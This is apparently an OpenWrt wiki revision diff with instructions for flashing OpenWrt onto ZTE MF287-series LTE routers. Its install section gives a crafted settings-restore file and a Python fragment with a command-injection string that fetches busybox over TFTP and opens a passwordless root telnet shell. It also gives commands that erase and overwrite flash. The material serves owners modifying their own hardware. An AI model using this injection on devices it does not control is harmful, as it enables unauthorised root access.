| Both sides previous revision Previous revision Next revision | Previous revision Next revisionBoth sides next revision |
| toh:zte:mf287 [2023/10/14 08:50] – Clarified MF287 Pro installation instructions andyboeh | toh:zte:mf287 [2024/08/07 08:26] – Clarify installation procedure andyboeh |
|---|
| ===== Supported Versions ===== | ===== Supported Versions ===== |
| |
| ---- datatable ---- | <!-- ToH: { |
| cols : Brand, Model, Versions, Supported Current Rel, OEM device homepage URL_url, Forum Search_search-forums, Device Techdata_pageid | "source": "json", |
| headers : Brand, Model, Version, Current Release, OEM Info, Forum Search, Technical Data | "dom": "t", |
| align : c,c,c,c,c,c,c | "paging": false, |
| filter : Brand=ZTE | "rotate": true, |
| filter : Model=MF287 | "shownColumns": ["brand", "model", "version", "supportedcurrentrel", "oemdevicehomepageurl", "forumsearch", "deviceid"], |
| filteror: Model=MF287Pro | "filterColumns": {"brand": "^ZTE$", "model": "^MF287$"} |
| ---- | } --> |
| |
| ===== Hardware Highlights ===== | ===== Hardware Highlights ===== |
| ---- datatable ---- | <!-- ToH: { |
| cols : Model, Versions, CPU, CPU MHz, CPU Cores_numcores, Flash MB_mbflashs, RAM MB_mbram, WLAN Hardware, WLAN 2.4GHz, WLAN 5.0GHz, Ethernet 100M ports_, Ethernet Gbit ports_, Modem, USB ports_ | "source": "json", |
| header : Model, Version,SoC,CPU MHz,CPU Cores,Flash MB,RAM MB,WLAN Hardware,WLAN2.4,WLAN5.0,100M ports,Gbit ports,Modem,USB | "dom": "t", |
| align : c,c,c,c,c,c,c,c,c,c,c,c,c | "paging": false, |
| filter : Brand=ZTE | "rotate": true, |
| filter : Model=MF287 | "shownColumns": ["model", "version", "cpu", "cpumhz", "cpucores", "flashmb", "rammb", "wlanhardware", "wlan24ghz", "wlan50ghz", "ethernet100mports", "ethernet1gports", "modem", "usbports"], |
| filteror : Model=MF287Pro | "filterColumns": {"brand": "^ZTE$", "model": "^MF287$"} |
| ---- | } --> |
| |
| |
| /* stable release */ | /* stable release */ |
| |
| ---- datatable ---- | <!-- ToH: { |
| cols : Model, Versions, Supported Current Rel, Firmware OpenWrt Install URL_url, Firmware OpenWrt Upgrade URL_url, Firmware OEM Stock URL_url | "source": "json", |
| headers : Model, Version, Current Release, Firmware OpenWrt Install, Firmware OpenWrt Upgrade, Firmware OEM Stock | "dom": "t", |
| align : c,c,c | "paging": false, |
| filter : Brand=ZTE | "rotate": true, |
| filter : Model=MF287 | "shownColumns": ["model", "version", "supportedcurrentrel", "firmwareopenwrtinstallurl", "firmwareopenwrtupgradeurl", "firmwareoemstockurl"], |
| filteror: Model=MF287Pro | "filterColumns": {"brand": "^ZTE$", "model": "^MF287$"} |
| ---- | } --> |
| |
| |
| /* snapshot */ | /* snapshot */ |
| /* delete once stable release is available */ | /* delete once stable release is available */ |
| ---- datatable ---- | <!-- ToH: { |
| cols : Model, Versions, Supported Current Rel, Firmware OpenWrt snapshot Install URL_url, Firmware OpenWrt snapshot Upgrade URL_url, Firmware OEM Stock URL_url | "source": "json", |
| headers : Model, Version, Current Release, Firmware OpenWrt snapshot Install, Firmware OpenWrt snapshot Upgrade, Firmware OEM Stock | "dom": "t", |
| align : c,c,c | "paging": false, |
| filter : Brand=ZTE | "shownColumns": ["model", "version", "supportedcurrentrel", "firmwareopenwrtsnapshotinstallurl", "firmwareopenwrtsnapshotupgradeurl", "firmwareoemstockurl"], |
| filter : Model=MF287 | "filterColumns": {"brand": "^ZTE$", "model": "^MF287$"} |
| filteror: Model=MF287Pro | } --> |
| ---- | |
| |
| ==== Option 1: Install from OEM firmware ==== | ==== Option 1: Install from OEM firmware ==== |
| | <WRAP round important 80%> |
| | **Required files** |
| |
| You need an exploit to get access to the stock firmware. Prepare the following: | |
| |
| * TFTP server - tftpd-hpa on Linux is tested, but tftpd32 should work as well | |
| * Static build of busybox for ARM, e.g. from https://busybox.net/downloads/binaries/1.21.1/ (Pick ARMV7 version) | * Static build of busybox for ARM, e.g. from https://busybox.net/downloads/binaries/1.21.1/ (Pick ARMV7 version) |
| | * exploit.dat from https://cloud.aboehler.at/index.php/s/GDixspLf4jgg8pT. Please use the password ''%%nzjmaBARoM%%'' |
| | * OpenWrt factory image - this is **not** listed in the table above. Please download it from [[https://firmware-selector.openwrt.org/?version=23.05.4&target=ipq40xx%2Fgeneric&id=zte_mf287pro]] |
| | </WRAP> |
| | |
| | Then do the following preparatory steps: |
| | |
| | * Set up a TFTP server - tftpd-hpa on Linux is tested, but tftpd32 should work as well |
| * Rename busybox to "telnetd" and put it to your TFTP root directory | * Rename busybox to "telnetd" and put it to your TFTP root directory |
| * Download the exploit.dat from https://cloud.aboehler.at/index.php/s/GDixspLf4jgg8pT. Please use the password ''%%nzjmaBARoM%%'' | * Put the OpenWrt **factory.bin** file to your TFTP directory as zte.bin |
| * Put the OpenWrt factory.bin file to your TFTP directory as zte.bin | |
| * Assign your computer the IP address 192.168.0.22 | * Assign your computer the IP address 192.168.0.22 |
| |
| - Log in to the web interface of your router, go to settings restore and use the file "exploit.dat" as the file to restore. Accept the message that the router is going to be restarted - don't worry, it won't restart. | - Log in to the web interface of your router, go to settings restore and use the file "exploit.dat" as the file to restore. Accept the message that the router is going to be restarted - don't worry, it won't restart. |
| - Watch your TFTP server serving the file "telnetd" | - Watch your TFTP server serving the file "telnetd" |
| - Use a Telnet client and connect to 192.168.0.1 | - Use a Telnet client and connect to 192.168.0.1 on port 10023 |
| - Login as user "admin" and password "admin" | - You should be logged in immediately, no password required |
| - Execute the following commands to take a backup and to install OpenWrt (NB: Instead of using tftp, you should also be able to use ''%%scp%%'' from the router): | - Execute the following commands to take a backup and to install OpenWrt (NB: Instead of using tftp, you should also be able to use ''%%scp%%'' from the router): |
| |
| <WRAP round important 80%> | <WRAP round important 80%> |
| For the MF287Pro, you need to replace ''%%mtd13%%'' with ''%%mtd17%%'' and ''%%mtdblock13%%'' with ''%%mtdblock17%%''! | For the MF287 and MF287+, you need to replace ''%%mtdXX%%'' with ''%%mtd13%%'' and ''%%mtdblockXX%%'' with ''%%mtdblock13%%''! |
| | For the MF287Pro, you need to replace ''%%mtdXX%%'' with ''%%mtd17%%'' and ''%%mtdblockXX%%'' with ''%%mtdblock17%%''! |
| </WRAP> | </WRAP> |
| |
| <WRAP round important 80%> | <WRAP round important 80%> |
| Please double-check the partition number by running ''%%cat /proc/mtd%%'' and looking for the line named ''%%rootfs%%''. Use this mtd number. | Please double-check the partition number by running ''%%cat /proc/mtd%%'' and looking for the line named ''%%rootfs%%''. Use this mtd number. |
| | </WRAP> |
| | |
| | <WRAP round important 80%> |
| | Please double-check that you flash the correct file. The factory image is **not** part of the table above, but it can be downloaded from the [[https://firmware-selector.openwrt.org/?version=23.05.4&target=ipq40xx%2Fgeneric&id=zte_mf287pro|Firmware Selector]]. |
| </WRAP> | </WRAP> |
| |
| tftp -g -r zte.bin 192.168.0.22 | tftp -g -r zte.bin 192.168.0.22 |
| cat /proc/driver/sensor_id | cat /proc/driver/sensor_id |
| flash_erase /dev/mtd13 0 0 | flash_erase /dev/mtdXX 0 0 |
| dd if=zte.bin of=/dev/mtdblock13 bs=131072 | dd if=zte.bin of=/dev/mtdblockXX bs=131072 |
| reboot | reboot |
| </code> | </code> |
| return False | return False |
| | |
| exploit = ";zte_debug.sh 192.168.0.22 telnetd; sleep 3600\n" | exploit = ";zte_debug.sh 192.168.0.22 telnetd; /tmp/telnetd -l /bin/sh -p 10023; sleep 3600\n" |
| out = bytearray() | out = bytearray() |
| for char in exploit: | for char in exploit: |
| ==== Info ==== | ==== Info ==== |
| |
| ---- datatemplatelist dttpllist ---- | <!-- ToH: { |
| template: meta:template_datatemplatelist | "source": "json", |
| cols : Brand, Model, Versions, Device Type, Availability, Supported Since Commit_git, Supported since Rel, Supported current Rel, Unsupported, Bootloader, CPU, Target, CPU MHz, Flash MBs, RAM MB, Switch, Ethernet 100M ports_, Ethernet Gbit ports_, Comments network ports_, Modem, VLAN, WLAN 2.4GHz, WLAN 5.0GHz, WLAN Hardwares, WLAN Comments_, Detachable Antennas_, USB ports_, SATA ports_, Comments USB SATA ports_, Serial, JTAG, LED count, Button count, Power supply, Device Techdata_pageid, Forum topic URL_url, wikidevi URL_url, OEM Device Homepage URL_url, Firmware OEM Stock URL_url, Firmware OpenWrt Install URL_url, Firmware OpenWrt Upgrade URL_url, Comments_ | "dom": "t", |
| filter : Brand=ZTE | "paging": false, |
| filter : Model=MF287 | "rotate": true, |
| ---- | "shownColumns": ["brand", "model", "version", "devicetype", "availability", "supportedsincecommit", "supportedsincerel", "supportedcurrentrel", "unsupported_functions", "bootloader", "cpu", "target", "cpumhz", "flashmb", "rammb", "switch", "ethernet100mports", "ethernet1gports", "commentsnetworkports", "modem", "vlan", "wlan24ghz", "wlan50ghz", "wlanhardware", "wlancomments", "detachableantennas", "usbports", "sataports", "commentsusbsataports", "serial", "jtag", "ledcount", "buttoncount", "powersupply", "deviceid", "owrt_forum_topic_url", "wikideviurl", "oemdevicehomepageurl", "firmwareoemstockurl", "firmwareopenwrtinstallurl", "firmwareopenwrtupgradeurl", "comments"], |
| | "filterColumns": {"brand": "^ZTE$", "model": "^MF287$"} |
| | } --> |
| |
| ---- datatemplatelist dttpllist ---- | ---- datatemplatelist dttpllist ---- |